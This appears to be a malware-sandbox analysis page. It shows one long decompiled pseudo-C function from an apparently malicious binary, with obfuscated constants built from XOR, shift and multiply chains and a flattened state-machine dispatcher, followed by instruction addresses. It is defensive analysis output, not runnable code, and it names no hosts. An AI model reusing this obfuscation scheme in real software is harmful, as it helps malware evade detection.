                                                                                                                      • Instruction ID: e22283a6dfe9b9976d3d34ad4da2edc3f947d8675ac2db9eed7d860d1a082432
                                                                                                                      • Opcode Fuzzy Hash: 613e668a931c6fe6e00fc100f24d35d5e931325cbcc48035c2cd1239f6ae4419
                                                                                                                      • Instruction Fuzzy Hash: 08820F71508381CFD778CF25C54AA8BBBE2BBD4718F108A2DE1D996260D7B58949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068BB7E(intOrPtr* __ecx) {
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				void* _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				intOrPtr _v96;
                                                                                                                      				intOrPtr* _v100;
                                                                                                                      				char _v104;
                                                                                                                      				char _v108;
                                                                                                                      				char _v112;
                                                                                                                      				char _v116;
                                                                                                                      				char _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				void* _t690;
                                                                                                                      				void* _t691;
                                                                                                                      				void* _t697;
                                                                                                                      				void* _t700;
                                                                                                                      				void* _t701;
                                                                                                                      				void* _t704;
                                                                                                                      				void* _t710;
                                                                                                                      				char _t711;
                                                                                                                      				void* _t713;
                                                                                                                      				void* _t717;
                                                                                                                      				void* _t719;
                                                                                                                      				void* _t725;
                                                                                                                      				signed int _t732;
                                                                                                                      				signed int _t733;
                                                                                                                      				signed int _t734;
                                                                                                                      				signed int _t735;
                                                                                                                      				signed int _t736;
                                                                                                                      				signed int _t737;
                                                                                                                      				signed int _t738;
                                                                                                                      				signed int _t739;
                                                                                                                      				signed int _t740;
                                                                                                                      				signed int _t741;
                                                                                                                      				signed int _t742;
                                                                                                                      				signed int _t743;
                                                                                                                      				signed int _t744;
                                                                                                                      				signed int _t745;
                                                                                                                      				signed int _t746;
                                                                                                                      				void* _t747;
                                                                                                                      				void* _t763;
                                                                                                                      				void* _t772;
                                                                                                                      				void* _t819;
                                                                                                                      				intOrPtr _t834;
                                                                                                                      				void* _t840;
                                                                                                                      				void* _t842;
                                                                                                                      				void* _t846;
                                                                                                                      				void* _t847;
                                                                                                                      				void* _t850;
                                                                                                                      
                                                                                                                      				_v92 = 0xf68129;
                                                                                                                      				_v100 = __ecx;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t732 = 0x6b;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t846 = 0;
                                                                                                                      				_t725 = 0x7252bf3;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v136 = 0x5ab987;
                                                                                                                      				_v136 = _v136 * 0x2c;
                                                                                                                      				_v136 = _v136 ^ 0x0f97e334;
                                                                                                                      				_v240 = 0x5f59f0;
                                                                                                                      				_v240 = _v240 << 5;
                                                                                                                      				_v240 = _v240 * 0x46;
                                                                                                                      				_v240 = _v240 ^ 0x4252f400;
                                                                                                                      				_v320 = 0x63212;
                                                                                                                      				_v320 = _v320 + 0xffffd9b7;
                                                                                                                      				_v320 = _v320 * 0x26;
                                                                                                                      				_v320 = _v320 + 0xffff4af1;
                                                                                                                      				_v320 = _v320 ^ 0x00e50ac7;
                                                                                                                      				_v192 = 0x354250;
                                                                                                                      				_t26 =  &_v192; // 0x354250
                                                                                                                      				_v192 =  *_t26 * 0x43;
                                                                                                                      				_v192 = _v192 ^ 0x0df05af0;
                                                                                                                      				_v308 = 0x42c709;
                                                                                                                      				_v308 = _v308 | 0x3400f9ef;
                                                                                                                      				_v308 = _v308 << 3;
                                                                                                                      				_v308 = _v308 + 0x3df1;
                                                                                                                      				_v308 = _v308 ^ 0xa2183d69;
                                                                                                                      				_v152 = 0x5369e0;
                                                                                                                      				_v152 = _v152 ^ 0xff6c3c62;
                                                                                                                      				_v152 = _v152 ^ 0xff3f5582;
                                                                                                                      				_v276 = 0x14bd80;
                                                                                                                      				_v276 = _v276 << 5;
                                                                                                                      				_v276 = _v276 ^ 0x5f90d5fe;
                                                                                                                      				_v276 = _v276 / _t732;
                                                                                                                      				_v276 = _v276 ^ 0x00de92e5;
                                                                                                                      				_v164 = 0xc6025f;
                                                                                                                      				_t733 = 0x77;
                                                                                                                      				_v164 = _v164 / _t733;
                                                                                                                      				_v164 = _v164 ^ 0x0001a9f8;
                                                                                                                      				_v196 = 0xc87c9f;
                                                                                                                      				_v196 = _v196 + 0x15df;
                                                                                                                      				_v196 = _v196 ^ 0x00c8927e;
                                                                                                                      				_v316 = 0xe66987;
                                                                                                                      				_v316 = _v316 ^ 0x1b2582a6;
                                                                                                                      				_t734 = 0x3b;
                                                                                                                      				_v316 = _v316 * 0x5b;
                                                                                                                      				_v316 = _v316 + 0x2fb1;
                                                                                                                      				_v316 = _v316 ^ 0xdea4c46c;
                                                                                                                      				_v224 = 0xfe0ac2;
                                                                                                                      				_v224 = _v224 + 0xfffff1ae;
                                                                                                                      				_v224 = _v224 ^ 0x9ea75b7a;
                                                                                                                      				_v224 = _v224 ^ 0x9e5aa70a;
                                                                                                                      				_v272 = 0x969b46;
                                                                                                                      				_v272 = _v272 / _t734;
                                                                                                                      				_t735 = 0x5e;
                                                                                                                      				_v272 = _v272 / _t735;
                                                                                                                      				_v272 = _v272 ^ 0xefd30b8f;
                                                                                                                      				_v272 = _v272 ^ 0xefd30d7c;
                                                                                                                      				_v376 = 0x150d1;
                                                                                                                      				_v376 = _v376 + 0xf180;
                                                                                                                      				_v376 = _v376 ^ 0x94f4a204;
                                                                                                                      				_v376 = _v376 + 0xffff1e44;
                                                                                                                      				_v376 = _v376 ^ 0x94f362d9;
                                                                                                                      				_v156 = 0xee57c3;
                                                                                                                      				_v156 = _v156 >> 1;
                                                                                                                      				_v156 = _v156 ^ 0x00740491;
                                                                                                                      				_v212 = 0xc602fd;
                                                                                                                      				_v212 = _v212 + 0x6a76;
                                                                                                                      				_v212 = _v212 + 0x1c99;
                                                                                                                      				_v212 = _v212 ^ 0x00ce641d;
                                                                                                                      				_v268 = 0xce4877;
                                                                                                                      				_v268 = _v268 ^ 0x1d22fca4;
                                                                                                                      				_v268 = _v268 | 0x3421cf88;
                                                                                                                      				_v268 = _v268 ^ 0x3de53c3b;
                                                                                                                      				_v124 = 0x747c03;
                                                                                                                      				_v124 = _v124 + 0xffffbae7;
                                                                                                                      				_v124 = _v124 ^ 0x007459dd;
                                                                                                                      				_v236 = 0x1c09ef;
                                                                                                                      				_t736 = 0x7d;
                                                                                                                      				_v236 = _v236 * 0x24;
                                                                                                                      				_v236 = _v236 >> 5;
                                                                                                                      				_v236 = _v236 ^ 0x00154586;
                                                                                                                      				_v248 = 0xce2f;
                                                                                                                      				_v248 = _v248 / _t736;
                                                                                                                      				_v248 = _v248 ^ 0x54fb24c5;
                                                                                                                      				_v248 = _v248 ^ 0x54f69380;
                                                                                                                      				_v368 = 0xa2f216;
                                                                                                                      				_v368 = _v368 ^ 0x77671628;
                                                                                                                      				_v368 = _v368 + 0xffffb776;
                                                                                                                      				_t737 = 0x12;
                                                                                                                      				_v368 = _v368 * 0x54;
                                                                                                                      				_v368 = _v368 ^ 0x4cdde93a;
                                                                                                                      				_v256 = 0x7ecaf1;
                                                                                                                      				_v256 = _v256 + 0xffff3fac;
                                                                                                                      				_v256 = _v256 >> 1;
                                                                                                                      				_v256 = _v256 ^ 0x003aef01;
                                                                                                                      				_v352 = 0xabf876;
                                                                                                                      				_v352 = _v352 >> 0xb;
                                                                                                                      				_v352 = _v352 + 0xffff46d6;
                                                                                                                      				_v352 = _v352 + 0x2c0c;
                                                                                                                      				_v352 = _v352 ^ 0xfff246b3;
                                                                                                                      				_v360 = 0x97ba77;
                                                                                                                      				_v360 = _v360 ^ 0x3e0377f3;
                                                                                                                      				_v360 = _v360 >> 0xd;
                                                                                                                      				_v360 = _v360 / _t737;
                                                                                                                      				_v360 = _v360 ^ 0x00060934;
                                                                                                                      				_v336 = 0x8ce7a6;
                                                                                                                      				_t738 = 0x2f;
                                                                                                                      				_v336 = _v336 / _t738;
                                                                                                                      				_v336 = _v336 + 0xffff2624;
                                                                                                                      				_v336 = _v336 | 0x278756f7;
                                                                                                                      				_v336 = _v336 ^ 0x278bbfdd;
                                                                                                                      				_v344 = 0xbf551b;
                                                                                                                      				_v344 = _v344 * 0x3a;
                                                                                                                      				_v344 = _v344 ^ 0x84c4554b;
                                                                                                                      				_v344 = _v344 << 0xf;
                                                                                                                      				_v344 = _v344 ^ 0x8ea60236;
                                                                                                                      				_v200 = 0x4381fe;
                                                                                                                      				_v200 = _v200 | 0xd1728d79;
                                                                                                                      				_v200 = _v200 ^ 0xd172d7b5;
                                                                                                                      				_v304 = 0x80f198;
                                                                                                                      				_t739 = 0x31;
                                                                                                                      				_v304 = _v304 * 0x64;
                                                                                                                      				_v304 = _v304 << 0xe;
                                                                                                                      				_v304 = _v304 + 0xffff9e99;
                                                                                                                      				_v304 = _v304 ^ 0x97d19a3f;
                                                                                                                      				_v312 = 0x373eb5;
                                                                                                                      				_v312 = _v312 / _t739;
                                                                                                                      				_v312 = _v312 >> 9;
                                                                                                                      				_v312 = _v312 ^ 0x9e5751db;
                                                                                                                      				_v312 = _v312 ^ 0x9e5d4ba0;
                                                                                                                      				_v188 = 0xb51e1e;
                                                                                                                      				_t740 = 0x6d;
                                                                                                                      				_v188 = _v188 * 0x30;
                                                                                                                      				_v188 = _v188 ^ 0x21f969de;
                                                                                                                      				_v128 = 0x6dafe5;
                                                                                                                      				_v128 = _v128 + 0xdb72;
                                                                                                                      				_v128 = _v128 ^ 0x00632f59;
                                                                                                                      				_v348 = 0xf775fc;
                                                                                                                      				_v348 = _v348 * 0x7b;
                                                                                                                      				_v348 = _v348 | 0xe77e6c6c;
                                                                                                                      				_v348 = _v348 + 0xffff92b3;
                                                                                                                      				_v348 = _v348 ^ 0xf7fd41f8;
                                                                                                                      				_v292 = 0x49707d;
                                                                                                                      				_v292 = _v292 + 0xffffa330;
                                                                                                                      				_v292 = _v292 + 0x378d;
                                                                                                                      				_v292 = _v292 ^ 0x2a616ae7;
                                                                                                                      				_v292 = _v292 ^ 0x2a2200cf;
                                                                                                                      				_v148 = 0xe2ca7f;
                                                                                                                      				_v148 = _v148 + 0x2800;
                                                                                                                      				_v148 = _v148 ^ 0x00ec4a73;
                                                                                                                      				_v180 = 0x28ed65;
                                                                                                                      				_t276 =  &_v180; // 0x28ed65
                                                                                                                      				_v180 =  *_t276 / _t740;
                                                                                                                      				_v180 = _v180 ^ 0x0008a356;
                                                                                                                      				_v340 = 0xb04f06;
                                                                                                                      				_v340 = _v340 | 0x19ae51aa;
                                                                                                                      				_v340 = _v340 + 0xffff0ab2;
                                                                                                                      				_v340 = _v340 >> 7;
                                                                                                                      				_v340 = _v340 ^ 0x003d7bf7;
                                                                                                                      				_v252 = 0x779412;
                                                                                                                      				_t741 = 0x28;
                                                                                                                      				_v252 = _v252 / _t741;
                                                                                                                      				_v252 = _v252 | 0x065d8c29;
                                                                                                                      				_v252 = _v252 ^ 0x0653787d;
                                                                                                                      				_v140 = 0x2cf99d;
                                                                                                                      				_v140 = _v140 << 0xf;
                                                                                                                      				_v140 = _v140 ^ 0x7ccdbf9f;
                                                                                                                      				_v300 = 0xa5c7e2;
                                                                                                                      				_v300 = _v300 ^ 0xf64f2b87;
                                                                                                                      				_v300 = _v300 | 0xd6032566;
                                                                                                                      				_v300 = _v300 << 7;
                                                                                                                      				_v300 = _v300 ^ 0x75f4cdbc;
                                                                                                                      				_v204 = 0xc71fe4;
                                                                                                                      				_v204 = _v204 ^ 0x39f608ad;
                                                                                                                      				_v204 = _v204 ^ 0x39346367;
                                                                                                                      				_v332 = 0x26340b;
                                                                                                                      				_t742 = 0xc;
                                                                                                                      				_v332 = _v332 / _t742;
                                                                                                                      				_v332 = _v332 >> 0xc;
                                                                                                                      				_v332 = _v332 + 0x4006;
                                                                                                                      				_v332 = _v332 ^ 0x00056ca9;
                                                                                                                      				_v244 = 0xb4bdd0;
                                                                                                                      				_v244 = _v244 ^ 0x9dcc8204;
                                                                                                                      				_t743 = 0x5c;
                                                                                                                      				_v244 = _v244 * 0x56;
                                                                                                                      				_v244 = _v244 ^ 0xe668140d;
                                                                                                                      				_v228 = 0xb7abf;
                                                                                                                      				_v228 = _v228 ^ 0x8d46dccd;
                                                                                                                      				_v228 = _v228 / _t743;
                                                                                                                      				_v228 = _v228 ^ 0x0183fb21;
                                                                                                                      				_v132 = 0x744574;
                                                                                                                      				_t744 = 0x2d;
                                                                                                                      				_v132 = _v132 * 0x27;
                                                                                                                      				_v132 = _v132 ^ 0x11b9ba9e;
                                                                                                                      				_v384 = 0x4471dc;
                                                                                                                      				_v384 = _v384 ^ 0x8273491f;
                                                                                                                      				_v384 = _v384 / _t744;
                                                                                                                      				_v384 = _v384 + 0xffffe0da;
                                                                                                                      				_v384 = _v384 ^ 0x02e26e3a;
                                                                                                                      				_v324 = 0x605f40;
                                                                                                                      				_v324 = _v324 + 0xffffce94;
                                                                                                                      				_v324 = _v324 + 0xffff95c1;
                                                                                                                      				_v324 = _v324 >> 6;
                                                                                                                      				_v324 = _v324 ^ 0x0001f278;
                                                                                                                      				_v380 = 0xfa4dc1;
                                                                                                                      				_t745 = 0x17;
                                                                                                                      				_v380 = _v380 * 0x71;
                                                                                                                      				_v380 = _v380 ^ 0x12ce666f;
                                                                                                                      				_v380 = _v380 | 0xc76ff931;
                                                                                                                      				_v380 = _v380 ^ 0xfff34e85;
                                                                                                                      				_v172 = 0xf73d33;
                                                                                                                      				_v172 = _v172 >> 7;
                                                                                                                      				_v172 = _v172 ^ 0x0001a374;
                                                                                                                      				_v364 = 0xb38f71;
                                                                                                                      				_v364 = _v364 + 0x4143;
                                                                                                                      				_v364 = _v364 ^ 0x53c53aac;
                                                                                                                      				_v364 = _v364 / _t745;
                                                                                                                      				_v364 = _v364 ^ 0x03acc109;
                                                                                                                      				_v260 = 0xa91f99;
                                                                                                                      				_v260 = _v260 >> 0xa;
                                                                                                                      				_v260 = _v260 ^ 0xc9224c65;
                                                                                                                      				_v260 = _v260 ^ 0xc926367a;
                                                                                                                      				_v284 = 0x5ea8fe;
                                                                                                                      				_v284 = _v284 * 0x3e;
                                                                                                                      				_v284 = _v284 | 0x757fbe3f;
                                                                                                                      				_v284 = _v284 ^ 0x77fedad5;
                                                                                                                      				_v264 = 0xc1651a;
                                                                                                                      				_v264 = _v264 / _t745;
                                                                                                                      				_v264 = _v264 + 0x650c;
                                                                                                                      				_v264 = _v264 ^ 0x00066731;
                                                                                                                      				_v372 = 0xd53751;
                                                                                                                      				_v372 = _v372 >> 0x10;
                                                                                                                      				_v372 = _v372 * 0x50;
                                                                                                                      				_v372 = _v372 ^ 0xc5a53504;
                                                                                                                      				_v372 = _v372 ^ 0xc5a85656;
                                                                                                                      				_v220 = 0x28743;
                                                                                                                      				_v220 = _v220 | 0x747e4fe0;
                                                                                                                      				_v220 = _v220 >> 8;
                                                                                                                      				_v220 = _v220 ^ 0x0078aec3;
                                                                                                                      				_v356 = 0x673303;
                                                                                                                      				_v356 = _v356 + 0xffff3afb;
                                                                                                                      				_v356 = _v356 >> 2;
                                                                                                                      				_t746 = 0x76;
                                                                                                                      				_t842 = 0x6cd454e;
                                                                                                                      				_v96 = 0x100;
                                                                                                                      				_t840 = 0xcf5796f;
                                                                                                                      				_v356 = _v356 * 9;
                                                                                                                      				_v356 = _v356 ^ 0x00e12344;
                                                                                                                      				_v232 = 0xe5489f;
                                                                                                                      				_v232 = _v232 * 0x62;
                                                                                                                      				_v232 = _v232 ^ 0x422e6763;
                                                                                                                      				_v232 = _v232 ^ 0x15e3beef;
                                                                                                                      				_v144 = 0x9d1c0d;
                                                                                                                      				_v144 = _v144 | 0x5a9db401;
                                                                                                                      				_v144 = _v144 ^ 0x5a9ceaa6;
                                                                                                                      				_v328 = 0xaba5b0;
                                                                                                                      				_v328 = _v328 + 0xfc55;
                                                                                                                      				_v328 = _v328 * 0x37;
                                                                                                                      				_v328 = _v328 * 0x78;
                                                                                                                      				_v328 = _v328 ^ 0x62b938e2;
                                                                                                                      				_v168 = 0x51360e;
                                                                                                                      				_v168 = _v168 << 2;
                                                                                                                      				_v168 = _v168 ^ 0x014a45e2;
                                                                                                                      				_v176 = 0x11fbeb;
                                                                                                                      				_v176 = _v176 << 0xa;
                                                                                                                      				_v176 = _v176 ^ 0x47e89d0f;
                                                                                                                      				_v216 = 0x8fcc87;
                                                                                                                      				_v216 = _v216 / _t746;
                                                                                                                      				_v216 = _v216 ^ 0xd2cd5e41;
                                                                                                                      				_v216 = _v216 ^ 0xd2c9cc36;
                                                                                                                      				_v184 = 0x8a666a;
                                                                                                                      				_v184 = _v184 * 0x6c;
                                                                                                                      				_v184 = _v184 ^ 0x3a66624b;
                                                                                                                      				_v288 = 0x12fc4d;
                                                                                                                      				_v288 = _v288 ^ 0x84b68421;
                                                                                                                      				_v288 = _v288 * 0x77;
                                                                                                                      				_v288 = _v288 ^ 0xa87aad10;
                                                                                                                      				_v296 = 0xb3f337;
                                                                                                                      				_v296 = _v296 >> 1;
                                                                                                                      				_v296 = _v296 + 0xffffa2d0;
                                                                                                                      				_v296 = _v296 + 0xffff98aa;
                                                                                                                      				_v296 = _v296 ^ 0x0050e375;
                                                                                                                      				_v160 = 0xa98b94;
                                                                                                                      				_v160 = _v160 ^ 0x93f8baf3;
                                                                                                                      				_v160 = _v160 ^ 0x935506dc;
                                                                                                                      				_v208 = 0xd26eef;
                                                                                                                      				_v208 = _v208 + 0xffff657d;
                                                                                                                      				_v208 = _v208 << 5;
                                                                                                                      				_v208 = _v208 ^ 0x1a3ecca6;
                                                                                                                      				_v280 = 0xce1cc4;
                                                                                                                      				_v280 = _v280 << 6;
                                                                                                                      				_v280 = _v280 << 0x10;
                                                                                                                      				_v280 = _v280 | 0xb3a7eb9b;
                                                                                                                      				_v280 = _v280 ^ 0xb3a418cd;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t747 = 0xb34e23f;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t690 = 0xa0b11f8;
                                                                                                                      							do {
                                                                                                                      								while(1) {
                                                                                                                      									L4:
                                                                                                                      									_t850 = _t725 - _t690;
                                                                                                                      									if(_t850 > 0) {
                                                                                                                      										break;
                                                                                                                      									}
                                                                                                                      									if(_t850 == 0) {
                                                                                                                      										_t700 = E00694624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
                                                                                                                      										_t847 = _t847 + 0x14;
                                                                                                                      										__eflags = _t700;
                                                                                                                      										_t747 = 0xb34e23f;
                                                                                                                      										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
                                                                                                                      										goto L2;
                                                                                                                      									} else {
                                                                                                                      										if(_t725 == 0x24fa5ba) {
                                                                                                                      											_push(_v212);
                                                                                                                      											_push(_v156);
                                                                                                                      											_t701 = E0069DCF7(_v376, 0x681984, __eflags);
                                                                                                                      											_push(_v236);
                                                                                                                      											_push(_v124);
                                                                                                                      											_t704 = E00689462(_t701, _v368,  &_v116, E0069DCF7(_v268, 0x681814, __eflags), _v256, _v136);
                                                                                                                      											_t847 = _t847 + 0x24;
                                                                                                                      											__eflags = _t704 - _v240;
                                                                                                                      											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
                                                                                                                      											E0068A8B0(_v352, _t701, _v360);
                                                                                                                      											E0068A8B0(_v336, _t702, _v344);
                                                                                                                      											_t840 = 0xcf5796f;
                                                                                                                      											goto L13;
                                                                                                                      										} else {
                                                                                                                      											if(_t725 == 0x505fe8e) {
                                                                                                                      												_t631 =  &_v208; // 0x39346367
                                                                                                                      												E0068957D(_v116, _v160,  *_t631, _v272, _v280);
                                                                                                                      											} else {
                                                                                                                      												if(_t725 == _t842) {
                                                                                                                      													_push(_v340);
                                                                                                                      													_push(_v180);
                                                                                                                      													_t710 = E0069DCF7(_v148, 0x681854, __eflags);
                                                                                                                      													_pop(_t763);
                                                                                                                      													_t844 = _t710;
                                                                                                                      													_t711 = 0x48;
                                                                                                                      													_v104 = _t711;
                                                                                                                      													_t713 = E00681C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
                                                                                                                      													_t847 = _t847 + 0x28;
                                                                                                                      													__eflags = _t713 - _v164;
                                                                                                                      													if(_t713 != _v164) {
                                                                                                                      														_t725 = _t840;
                                                                                                                      													} else {
                                                                                                                      														_t834 =  *0x6a3dfc; // 0x0
                                                                                                                      														E0068ED7E(_v244, _t834, _v228,  &_v68, 0x40);
                                                                                                                      														_t847 = _t847 + 0xc;
                                                                                                                      														_t725 = 0x9bcfe4f;
                                                                                                                      													}
                                                                                                                      													E0068A8B0(_v132, _t844, _v384);
                                                                                                                      													goto L13;
                                                                                                                      												} else {
                                                                                                                      													if(_t725 == 0x7252bf3) {
                                                                                                                      														_t725 = 0x24fa5ba;
                                                                                                                      														continue;
                                                                                                                      													} else {
                                                                                                                      														if(_t725 == _t819) {
                                                                                                                      															_t717 = E0068B144(_v120, _v188, _v308, _v128, _v348, _v292);
                                                                                                                      															_t847 = _t847 + 0x10;
                                                                                                                      															__eflags = _t717 - _v152;
                                                                                                                      															_t725 =  ==  ? _t842 : _t840;
                                                                                                                      															while(1) {
                                                                                                                      																L1:
                                                                                                                      																_t747 = 0xb34e23f;
                                                                                                                      																L2:
                                                                                                                      																L3:
                                                                                                                      																_t690 = 0xa0b11f8;
                                                                                                                      																goto L4;
                                                                                                                      															}
                                                                                                                      														} else {
                                                                                                                      															_t856 = _t725 - 0x9bcfe4f;
                                                                                                                      															if(_t725 == 0x9bcfe4f) {
                                                                                                                      																_push(_v172);
                                                                                                                      																_push(_v380);
                                                                                                                      																_t719 = E0069DCF7(_v324, 0x681854, _t856);
                                                                                                                      																_pop(_t772);
                                                                                                                      																E0068AA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
                                                                                                                      																_t725 =  ==  ? 0xa0b11f8 : _t840;
                                                                                                                      																E0068A8B0(_v220, _t719, _v356);
                                                                                                                      																_t847 = _t847 + 0x2c;
                                                                                                                      																L13:
                                                                                                                      																_t842 = 0x6cd454e;
                                                                                                                      																L32:
                                                                                                                      																_t819 = 0x9b01f0f;
                                                                                                                      																_t747 = 0xb34e23f;
                                                                                                                      																_t690 = 0xa0b11f8;
                                                                                                                      															}
                                                                                                                      															goto L33;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									L36:
                                                                                                                      									return _t846;
                                                                                                                      								}
                                                                                                                      								__eflags = _t725 - _t747;
                                                                                                                      								if(_t725 == _t747) {
                                                                                                                      									_t691 = E00682BD9(_v112);
                                                                                                                      									_t725 = 0xb500bcf;
                                                                                                                      									__eflags = _t691;
                                                                                                                      									_t846 =  !=  ? 1 : _t846;
                                                                                                                      									goto L32;
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t725 - 0xb500bcf;
                                                                                                                      									if(_t725 == 0xb500bcf) {
                                                                                                                      										E0069CA69(_v112, _v168, _v176);
                                                                                                                      										_t725 = 0xcc5fcc9;
                                                                                                                      										goto L1;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t725 - 0xcc5fcc9;
                                                                                                                      										if(_t725 == 0xcc5fcc9) {
                                                                                                                      											E0068A958(_v216, _v108, _v184);
                                                                                                                      											_t725 = _t840;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t747 = 0xb34e23f;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t725 - _t840;
                                                                                                                      											if(_t725 == _t840) {
                                                                                                                      												E0068A958(_v288, _v120, _v296);
                                                                                                                      												_t725 = 0x505fe8e;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													_t747 = 0xb34e23f;
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t725 - 0xec78b05;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													goto L33;
                                                                                                                      												} else {
                                                                                                                      													_v104 = _v96;
                                                                                                                      													_t697 = E006892C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
                                                                                                                      													_t847 = _t847 + 0x14;
                                                                                                                      													__eflags = _t697 - _v192;
                                                                                                                      													_t819 = 0x9b01f0f;
                                                                                                                      													_t747 = 0xb34e23f;
                                                                                                                      													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
                                                                                                                      													goto L3;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L36;
                                                                                                                      								L33:
                                                                                                                      							} while (_t725 != 0xc75135f);
                                                                                                                      							goto L36;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x0068c16b
                                                                                                                      0x0068c174
                                                                                                                      0x0068c17f
                                                                                                                      0x0068c18a
                                                                                                                      0x0068c195
                                                                                                                      0x0068c19d
                                                                                                                      0x0068c1a8
                                                                                                                      0x0068c1b0
                                                                                                                      0x0068c1b8
                                                                                                                      0x0068c1c0
                                                                                                                      0x0068c1c5
                                                                                                                      0x0068c1cd
                                                                                                                      0x0068c1d8
                                                                                                                      0x0068c1e3
                                                                                                                      0x0068c1ee
                                                                                                                      0x0068c1fa
                                                                                                                      0x0068c1fd
                                                                                                                      0x0068c201
                                                                                                                      0x0068c206
                                                                                                                      0x0068c20e
                                                                                                                      0x0068c216
                                                                                                                      0x0068c223
                                                                                                                      0x0068c238
                                                                                                                      0x0068c23b
                                                                                                                      0x0068c242
                                                                                                                      0x0068c24d
                                                                                                                      0x0068c258
                                                                                                                      0x0068c26e
                                                                                                                      0x0068c275
                                                                                                                      0x0068c280
                                                                                                                      0x0068c293
                                                                                                                      0x0068c296
                                                                                                                      0x0068c29d
                                                                                                                      0x0068c2a8
                                                                                                                      0x0068c2b0
                                                                                                                      0x0068c2c0
                                                                                                                      0x0068c2c4
                                                                                                                      0x0068c2cc
                                                                                                                      0x0068c2d4
                                                                                                                      0x0068c2dc
                                                                                                                      0x0068c2e4
                                                                                                                      0x0068c2ec
                                                                                                                      0x0068c2f1
                                                                                                                      0x0068c2f9
                                                                                                                      0x0068c306
                                                                                                                      0x0068c307
                                                                                                                      0x0068c30b
                                                                                                                      0x0068c313
                                                                                                                      0x0068c31b
                                                                                                                      0x0068c323
                                                                                                                      0x0068c32e
                                                                                                                      0x0068c336
                                                                                                                      0x0068c341
                                                                                                                      0x0068c349
                                                                                                                      0x0068c351
                                                                                                                      0x0068c361
                                                                                                                      0x0068c365
                                                                                                                      0x0068c36d
                                                                                                                      0x0068c378
                                                                                                                      0x0068c380
                                                                                                                      0x0068c38b
                                                                                                                      0x0068c396
                                                                                                                      0x0068c3a3
                                                                                                                      0x0068c3a7
                                                                                                                      0x0068c3af
                                                                                                                      0x0068c3b7
                                                                                                                      0x0068c3cb
                                                                                                                      0x0068c3d2
                                                                                                                      0x0068c3dd
                                                                                                                      0x0068c3e8
                                                                                                                      0x0068c3f0
                                                                                                                      0x0068c3fa
                                                                                                                      0x0068c3fe
                                                                                                                      0x0068c406
                                                                                                                      0x0068c40e
                                                                                                                      0x0068c419
                                                                                                                      0x0068c424
                                                                                                                      0x0068c42c
                                                                                                                      0x0068c437
                                                                                                                      0x0068c43f
